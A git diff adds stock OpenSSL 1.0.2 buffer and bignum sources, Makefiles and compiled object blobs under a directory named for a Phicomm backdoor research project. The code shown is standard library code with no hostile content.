+* OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+* POSSIBILITY OF SUCH DAMAGE.
+******************************************************************************/
+
+#ifndef RSAZ_EXP_H
+# define RSAZ_EXP_H
+
+# include <openssl/bn.h>
+
+void RSAZ_1024_mod_exp_avx2(BN_ULONG result[16],
+                            const BN_ULONG base_norm[16],
+                            const BN_ULONG exponent[16],
+                            const BN_ULONG m_norm[16], const BN_ULONG RR[16],
+                            BN_ULONG k0);
+int rsaz_avx2_eligible();
+
+void RSAZ_512_mod_exp(BN_ULONG result[8],
+                      const BN_ULONG base_norm[8], const BN_ULONG exponent[8],
+                      const BN_ULONG m_norm[8], BN_ULONG k0,
+                      const BN_ULONG RR[8]);
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/todo b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/todo
new file mode 100644
index 0000000..e47e381
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/todo
@@ -0,0 +1,3 @@
+Cache RECP_CTX values
+make the result argument independant of the inputs.
+split up the _exp_ functions
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/vms-helper.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/vms-helper.c
new file mode 100644
index 0000000..f342e90
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/vms-helper.c
@@ -0,0 +1,68 @@
+/* vms-helper.c */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+bn_div_words_abort(int i)
+{
+#ifdef BN_DEBUG
+# if !defined(OPENSSL_NO_STDIO) && !defined(OPENSSL_SYS_WIN16)
+    fprintf(stderr, "Division would overflow (%d)\n", i);
+# endif
+    abort();
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile
new file mode 100644
index 0000000..2efba47
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile
@@ -0,0 +1,97 @@
+#
+# OpenSSL/crypto/buffer/Makefile
+#
+
+DIR=	buffer
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= buffer.c buf_str.c buf_err.c
+LIBOBJ= buffer.o buf_str.o buf_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= buffer.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+buf_err.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+buf_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+buf_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+buf_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+buf_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+buf_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+buf_err.o: buf_err.c
+buf_str.o: ../../e_os.h ../../include/openssl/bio.h
+buf_str.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+buf_str.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+buf_str.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+buf_str.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+buf_str.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+buf_str.o: ../../include/openssl/symhacks.h ../cryptlib.h buf_str.c
+buffer.o: ../../e_os.h ../../include/openssl/bio.h
+buffer.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+buffer.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+buffer.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+buffer.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+buffer.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+buffer.o: ../../include/openssl/symhacks.h ../cryptlib.h buffer.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.bak
new file mode 100644
index 0000000..2efba47
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.bak
@@ -0,0 +1,97 @@
+#
+# OpenSSL/crypto/buffer/Makefile
+#
+
+DIR=	buffer
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= buffer.c buf_str.c buf_err.c
+LIBOBJ= buffer.o buf_str.o buf_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= buffer.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+buf_err.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+buf_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+buf_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+buf_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+buf_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+buf_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+buf_err.o: buf_err.c
+buf_str.o: ../../e_os.h ../../include/openssl/bio.h
+buf_str.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+buf_str.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+buf_str.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+buf_str.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+buf_str.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+buf_str.o: ../../include/openssl/symhacks.h ../cryptlib.h buf_str.c
+buffer.o: ../../e_os.h ../../include/openssl/bio.h
+buffer.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+buffer.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+buffer.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+buffer.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+buffer.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+buffer.o: ../../include/openssl/symhacks.h ../cryptlib.h buffer.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.save
new file mode 100644
index 0000000..2efba47
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/Makefile.save
@@ -0,0 +1,97 @@
+#
+# OpenSSL/crypto/buffer/Makefile
+#
+
+DIR=	buffer
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= buffer.c buf_str.c buf_err.c
+LIBOBJ= buffer.o buf_str.o buf_err.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= buffer.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+buf_err.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+buf_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+buf_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+buf_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+buf_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+buf_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+buf_err.o: buf_err.c
+buf_str.o: ../../e_os.h ../../include/openssl/bio.h
+buf_str.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+buf_str.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+buf_str.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+buf_str.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+buf_str.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+buf_str.o: ../../include/openssl/symhacks.h ../cryptlib.h buf_str.c
+buffer.o: ../../e_os.h ../../include/openssl/bio.h
+buffer.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+buffer.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+buffer.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+buffer.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+buffer.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+buffer.o: ../../include/openssl/symhacks.h ../cryptlib.h buffer.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.c
new file mode 100644
index 0000000..631eec3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.c
@@ -0,0 +1,97 @@
+/* crypto/buffer/buf_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/buffer.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_BUF,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_BUF,0,reason)
+
+static ERR_STRING_DATA BUF_str_functs[] = {
+    {ERR_FUNC(BUF_F_BUF_MEMDUP), "BUF_memdup"},
+    {ERR_FUNC(BUF_F_BUF_MEM_GROW), "BUF_MEM_grow"},
+    {ERR_FUNC(BUF_F_BUF_MEM_GROW_CLEAN), "BUF_MEM_grow_clean"},
+    {ERR_FUNC(BUF_F_BUF_MEM_NEW), "BUF_MEM_new"},
+    {ERR_FUNC(BUF_F_BUF_STRDUP), "BUF_strdup"},
+    {ERR_FUNC(BUF_F_BUF_STRNDUP), "BUF_strndup"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA BUF_str_reasons[] = {
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_BUF_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(BUF_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, BUF_str_functs);
+        ERR_load_strings(0, BUF_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..9883ee49ac50d1282f0e929ba11a57fcac7c80eb
GIT binary patch
literal 1360
zcmbtS%}T>S5S}#tTkr=DLPg?9MZ3g5L=RGw>P18f1uqiPHf_Z=Ey)JdgT8`~;v*D%
z0UyJo;?0ZBG`n%TRs<cG%*?m*%};jk^2diM!vHA;?7>$gQGnCbm!IppIY`4eyiLr%
zKf=+$!LGGbEJZ$#tR1$&?Cjch)D72e*KKBRF2^toAa@dV5cTM!2w1j5n2Aa<6B{sY
z3SeAK8kzL)$UP23_?$Q+?r%an48ZG0zdW<=hBSk+q(U^4=@bxMv%5tvMv)0a-@z_E
z`~yyZpjXB*oL1&cb}mI##|r{hhJ2ymG+J)O*)JYCArCJ6S_qaXL!0z$!@}z(cT2!9
zGq!c<aqo%)tGL_+RtiI4<yN!l`H1-~?lHWkY{=d6rHE^O#M(it?FIZASl~5W=GC2Q
z;5I$c{2wNRT)I2`59UP8<Ufd*a#dNtfH3)<<XK)in$`J>cs_#qSN<w;siuvpitN9l
zg6PZs(rzi3n%Y(a#g{w@Q6G9`J$H|><Xh;gLc6MRjsexw`S&78-%ID8VIIBaoXD5v
zNentGfKjwGr{qh#UvHvx=!5bS8yG`NHFQ2<`rQ%bLG-sMP(;89GKF40{<BD|C7H3K
G^FIN$d{3hQ

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.c
new file mode 100644
index 0000000..ebc5ab4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.c
@@ -0,0 +1,130 @@
+/* crypto/buffer/buffer.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+
+size_t BUF_strnlen(const char *str, size_t maxlen)
+{
+    const char *p;
+
+    for (p = str; maxlen-- != 0 && *p != '\0'; ++p) ;
+
+    return p - str;
+}
+
+char *BUF_strdup(const char *str)
+{
+    if (str == NULL)
+        return (NULL);
+    return BUF_strndup(str, strlen(str));
+}
+
+char *BUF_strndup(const char *str, size_t siz)
+{
+    char *ret;
+
+    if (str == NULL)
+        return (NULL);
+
+    siz = BUF_strnlen(str, siz);
+
+    ret = OPENSSL_malloc(siz + 1);
+    if (ret == NULL) {
+        BUFerr(BUF_F_BUF_STRNDUP, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    BUF_strlcpy(ret, str, siz + 1);
+    return (ret);
+}
+
+void *BUF_memdup(const void *data, size_t siz)
+{
+    void *ret;
+
+    if (data == NULL)
+        return (NULL);
+
+    ret = OPENSSL_malloc(siz);
+    if (ret == NULL) {
+        BUFerr(BUF_F_BUF_MEMDUP, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    return memcpy(ret, data, siz);
+}
+
+size_t BUF_strlcpy(char *dst, const char *src, size_t size)
+{
+    size_t l = 0;
+    for (; size > 1 && *src; size--) {
+        *dst++ = *src++;
+        l++;
+    }
+    if (size)
+        *dst = '\0';
+    return l + strlen(src);
+}
+
+size_t BUF_strlcat(char *dst, const char *src, size_t size)
+{
+    size_t l = 0;
+    for (; size > 0 && *dst; size--, dst++)
+        l++;
+    return l + BUF_strlcpy(dst, src, size);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/buffer/buf_str.o
new file mode 100644
index 0000000000000000000000000000000000000000..12833649bb77c1ac5a53a42dda181bce46b71335
GIT binary patch
literal 2736
zcmb_eO>7%g5PoZ$B!JnZfRspq%7+RXm9D&{hz1q#Pwl*=OVcI}qCaSH+--yKU)O7t
z0D_88)UB}8BL|KgQPpz}U^R%+UN990P!Ht5uObj6hXhnuW_IV*+pXb%80mTDeLLUG
z?3?%A`pul4k4O>|BC)4fcP3EAlKovf<(VlavwPV3;MPC5^cQzF`S`ER7$4hQKD~$8
z8{BQL{)`XP1<koJeTbiN?FsIzFU<j&w;sa~&Nn}z;%C~;tvR)=URg@R^rMsT^D(B&
zso#1ItFrEV&z;NM`C4;6S^q$HR*oD^A6v%on)5qQxzl;3wYP77D=z6{ZN9iEy|N{9
zF4p&U+m^FuW0D5dT!%b%^izp}`{EUM?E-f`;~O2VwU4=8sB{4m&P-#ahq&{nmwM@W
zEYL5vH7{{z*@K}Bta>z1^_-~MFL{u+rosIeDBA;|=A$p%ta%fY3}YE;d+mY_ueR|8
zZ=G^~vRxM-ubiBEO>;U2TJhm$$2!{hH9MX;y?2<|1Dbnj^*hL{JC}6lb3eM&S)Og4
zFdDX{lo*@HW}irGpP6k|?Pg+Jc~nX6R3C48Q}vBqNhP^^%!e6^LD@qv?tn3IV1`8)
zYa<qgfpWjEnDputljet{(RlyBdDtMxd4QfhNO~LSB-sY)ygc-7WS=~;7){HG$U%7|
